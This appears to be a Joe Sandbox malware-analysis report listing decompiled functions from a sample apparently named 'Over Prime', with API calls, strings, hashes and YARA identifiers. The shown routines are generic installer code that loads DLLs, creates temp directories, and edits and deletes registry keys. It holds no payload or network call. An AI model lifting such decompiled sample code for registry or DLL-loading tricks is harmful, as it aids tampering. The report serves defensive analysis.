Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004068b1
0x004068ba
0x004068bc
0x004068bc
0x004068c0
0x004068d3
0x004068cd
0x004068cd
0x004068cd
0x004068ec
0x00406900
0x00406907

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
wsprintfW.USER32 ref: 004068EC
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Strings

UXTHEME, xrefs: 004068A3
%s%S.dll, xrefs: 004068E6
\, xrefs: 004068C2

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a79
0x00405a7d
0x00405a80
0x00405a86
0x00405a8a
0x00405a8e
0x00405a96
0x00405a9d
0x00405aa3
0x00405aaa
0x00405ab1
0x00405ab9
0x00405abb
0x00000000
0x00405abb
0x00405ac5
0x00405acc
0x00405ae2
0x00000000
0x00000000
0x00000000
0x00405ae4
0x00405ae8

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
GetLastError.KERNEL32 ref: 00405AC5
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
GetLastError.KERNEL32 ref: 00405AE4

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3355392842
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004063AA(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E0040690A(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402eb4
0x00402ebd
0x00402ec6
0x00402ed2
0x00402edb
0x00402ee5
0x00402f0a
0x00402f10
0x00402f15
0x00402f16
0x00402f46
0x00402f1f
0x00402f21
0x00402f71
0x00402f74
0x00000000
0x00402f7a
0x00402f30
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f3f
0x00402f44
0x00402f45
0x00402f45
0x00402f52
0x00402f5a
0x00402f61
0x00000000
0x00402f8a
0x00000000
0x00402f69
0x00402ef5
0x00402f08
0x00000000
0x00000000
0x00000000
0x00402f08
0x00402f90

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
Instruction ID: ca6229ec891c5908b4c2d3bab14ae3db7b9396451d72a40731f1c02386a45f13
Opcode Fuzzy Hash: 8cb330a57336db5e00a931244e28e0c1e8cbbd051d222c2bd1499622aecedac4
Instruction Fuzzy Hash: DA215A7150010ABBEF119F90CE89EEF7B7DEB50384F100076F909B21A0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 73B91817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E73B91817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x73b9506c = _a8;
				 *0x73b95070 = _a16;
				 *0x73b95074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73b95048, E73B91651);
				_push(1);
				_t37 = E73B91BFF();
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E73B9243E(_t54);
					}
					_push(_t54);
					E73B92480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E73B92655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E73B91666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E73B92655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E73B92655();
							_t37 = GlobalFree(E73B91312(E73B91654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E73B92618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E73B915DD( *0x73b95068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E73B92E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E73B92B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E73B92810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x73b91817
0x73b91817
0x73b91817
0x73b91824
0x73b9182c
0x73b91839
0x73b91847
0x73b9184a
0x73b9184c
0x73b91851
0x73b91856
0x73b91978
0x73b91978
0x73b9185c
0x73b91860
0x73b91863
0x73b91868
0x73b91869
0x73b9186a
0x73b91870
0x73b91876
0x73b918a6
0x73b918ad
0x73b918d1
0x73b9191e
0x73b9191f
0x73b918d3
0x73b918d3
0x73b918d4
0x73b918dd
0x73b918de
0x73b918e8
0x73b918eb
0x73b918f0
0x73b918f7
0x73b918f7
0x73b918fd
0x73b918fe
0x73b91904
0x73b9190a
0x73b91917
0x73b91918
0x73b9191b
0x73b918af
0x73b918af
0x73b918b0
0x73b918c5
0x73b918c5
0x73b91929
0x73b9192c
0x73b91939
0x73b91940
0x73b91948
0x73b9194b
0x73b9194b
0x73b91948
0x73b91958
0x73b91960
0x73b91965
0x73b91958
0x73b9196d
0x00000000
0x73b9196f
0x00000000
0x73b91970
0x73b9196d
0x73b9187a
0x73b9187d
0x73b9189b
0x00000000
0x00000000
0x73b9189e
0x73b918a3
0x73b918a3
0x73b918a5
0x00000000
0x73b918a5
0x73b9187f
0x73b91880
0x73b91888
0x73b91889
0x00000000
0x73b91889
0x73b91882
0x73b91883
0x73b91891
0x00000000
0x73b91891
0x73b91886
0x00000000
0x00000000
0x00000000
0x73b91886

APIs

Part of subcall function 73B91BFF: GlobalFree.KERNEL32(?), ref: 73B91E74
Part of subcall function 73B91BFF: GlobalFree.KERNEL32(?), ref: 73B91E79
Part of subcall function 73B91BFF: GlobalFree.KERNEL32(?), ref: 73B91E7E

GlobalFree.KERNEL32(00000000), ref: 73B918C5
FreeLibrary.KERNEL32(?), ref: 73B9194B
GlobalFree.KERNEL32(00000000), ref: 73B91970

Part of subcall function 73B9243E: GlobalAlloc.KERNEL32(00000040,?), ref: 73B9246F

Part of subcall function 73B92810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73B91896,00000000), ref: 73B928E0

Part of subcall function 73B91666: wsprintfW.USER32 ref: 73B91694

Strings

, xrefs: 73B91951

Memory Dump Source

Source File: 00000000.00000002.1008093316.0000000073B91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73B90000, based on PE: true

Associated: 00000000.00000002.1008035797.0000000073B90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008178961.0000000073B94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1008235435.0000000073B96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b90000_Over Prime.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 220a831801f6ac4eb05584e922dedc21f0c7d1c8c5246188b6e4c68227757ef1
Instruction ID: 8e61089d42b98e2724c78bc935b92137352ac423a3264f7b4cab5596a3bc8703
Opcode Fuzzy Hash: 220a831801f6ac4eb05584e922dedc21f0c7d1c8c5246188b6e4c68227757ef1
Instruction Fuzzy Hash: 1841B2B2800309DFFB119F20DAC8B9537ACEF45354F194575E90BAE0C6EB788085E768

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406484();
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
0x00401c85
0x00401cda
0x00401cdc
0x00401ce7
0x00401cf1
0x00401cf4
0x00401cf4
0x00401cfd
0x00000000
0x00401c87
0x00401c8e
0x00401c90
0x00401c93
0x00401c99
0x00401ca0
0x00401ca3
0x00401ccb
0x00401d03
0x00401d03
0x00401ca5
0x00401cb3
0x00401cbb
0x00401cbe
0x00401cbe
0x00401ca3
0x00401d06
0x00401d09
0x00401d0f
0x00402ba4
0x00402ba4
0x00402c2d
0x00402c39

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004020D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73
libraryCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E004020D8(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t31;
				void* _t32;
				WCHAR* _t35;
				intOrPtr* _t36;
				void* _t37;
				void* _t39;

				_t32 = __ebx;
				asm("sbb eax, 0x434fc0");
				 *(_t39 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
					return 0;
				}
				_t35 = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
					L3:
					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
					_t47 = _t23 - _t32;
					 *(_t39 + 8) = _t23;
					if(_t23 == _t32) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
					if(_t36 == _t32) {
						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
					} else {
						 *(_t39 - 4) = _t32;
						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, "X\xef\xbf\xbd[", 0x40a000); // 						} else {
							E00401423( *((intOrPtr*)(_t39 - 0x28)));
							if( *_t36() != 0) {
								 *(_t39 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
						FreeLibrary( *(_t39 + 8));
					}
					goto L16;
				}
				_t31 = GetModuleHandleW(_t35); // executed
				 *(_t39 + 8) = _t31;
				if(_t31 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x004020d8
0x004020d8
0x004020dd
0x004020e4
0x004021a3
0x004022f1
0x004022f1
0x00402c2a
0x00402c2d
0x00402c39
0x00402c39
0x004020f3
0x004020fd
0x00402100
0x00402110
0x00402114
0x0040211a
0x0040211c
0x0040211f
0x0040219c
0x00000000
0x0040219c
0x00402121
0x0040212c
0x00402130
0x00402170
0x00402132
0x00402135
0x00402138
0x00402164
0x0040213a
0x0040213d
0x00402146
0x00402148
0x00402148
0x00402146
0x00402138
0x00402178
0x00402191
0x00402191
0x00000000
0x00402178
0x00402103
0x0040210b
0x0040210e
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00000000,00425A20,75B523A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191

Strings

X[, xrefs: 00402156

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID: X[
API String ID: 334405425-596493277
Opcode ID: 6e833e9dfbd4f8185cbafe9a8d763299a8377b070d9b9c984b500f91f6c30e1a
Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
Opcode Fuzzy Hash: 6e833e9dfbd4f8185cbafe9a8d763299a8377b070d9b9c984b500f91f6c30e1a
Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D

Uniqueness

Uniqueness Score: -1.00%

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5f0 = E00402D84(3);
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
				return 0;
			}

0x0040248a
0x0040248a
0x0040248a
0x0040248a
0x0040248d
0x00402494
0x0040249e
0x004024a1
0x004024aa
0x004024b1
0x004024b8
0x004024bb
0x004024c1
0x004024cb
0x004024cf
0x004024da
0x004024da
0x004024e1
0x004024eb
0x004024f1
0x004024f4
0x004024f4
0x004024f8
